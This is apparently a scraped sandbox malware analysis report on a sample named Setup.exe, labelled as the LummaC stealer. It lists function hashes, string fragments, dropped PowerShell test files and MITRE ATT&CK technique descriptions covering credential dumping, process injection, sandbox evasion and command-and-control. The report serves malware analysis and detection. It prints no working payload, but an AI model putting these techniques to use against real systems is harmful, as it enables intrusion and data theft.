Opcode ID: 14aa2a8c8b5f184a85014fb3fa4daa28b33c2e1f625113d91f11f2b634784474
Instruction ID: a5b35bdcf043f72fda6b69fabfe9c4db48295275df4638d33c161c4fd5594bbb
Opcode Fuzzy Hash: 14aa2a8c8b5f184a85014fb3fa4daa28b33c2e1f625113d91f11f2b634784474
Instruction Fuzzy Hash: 3D11E561B493A68FC72B526C6D24155AFB6AFC395072945DBD080CF3ABCD158C4A83A3

Function 07DC3350 Relevance: 5.4, Strings: 4, Instructions: 355COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DC35CE
4'^q, xrefs: 07DC35D8
tP^q, xrefs: 07DC3724
tP^q, xrefs: 07DC3730

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: 5b3459c2f23c25a72d0b24d4bed6d11dbe095fd4f2db5170a7b7b32063874598
Instruction ID: 9da23d9337194acb4838833ab2f27983e24b1f5b2e255040d6ed2b4e212fb938
Opcode Fuzzy Hash: 5b3459c2f23c25a72d0b24d4bed6d11dbe095fd4f2db5170a7b7b32063874598
Instruction Fuzzy Hash: 9CC158B27442579FDB15CA78981167AFFA29F82210F18C4AED540CF3A2DE76C845C7A3

Function 07DC3228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC3284
$^q, xrefs: 07DC3256
$^q, xrefs: 07DC323A
$^q, xrefs: 07DC3290

Memory Dump Source

Source File: 00000004.00000002.2048954709.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: d76f746b4eef387e80919f0d148f6edb775562db2d51e4cb0faacecb84b2df8f
Instruction ID: d5e45c1e76ee000a3271a4d254bf734554d9603955e2ebbfe41b24fc79b82fae
Opcode Fuzzy Hash: d76f746b4eef387e80919f0d148f6edb775562db2d51e4cb0faacecb84b2df8f
Instruction Fuzzy Hash: AA2124B27043179BEF28996A9C05B67EBDA9FC1715F24C42EE945CB385CD36C84183A2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_checo44s.lwe.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzikyems.mg4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msheundz.qlk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zznsj3bk.pjd.ps1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
Setup.exe

Function 032059F0 Relevance: 28.7, APIs: 9, Strings: 7, Instructions: 656
memorycomCOMMON

Function 03205670 Relevance: 15.3, Strings: 12, Instructions: 262
COMMON

Function 031FB124 Relevance: 11.5, APIs: 2, Strings: 4, Instructions: 976
COMMON

Function 031DDBDB Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 312
COMMON

Function 031D84B0 Relevance: 7.7, APIs: 5, Instructions: 237
threadCOMMON

Function 031FBCB4 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 400
COMMON

Function 031DE2D1 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Function 00F80ABF Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 031DE2A4 Relevance: 3.9, Strings: 3, Instructions: 193
COMMON

Function 031DE2A0 Relevance: 3.9, Strings: 3, Instructions: 176
COMMON

Function 031FA497 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre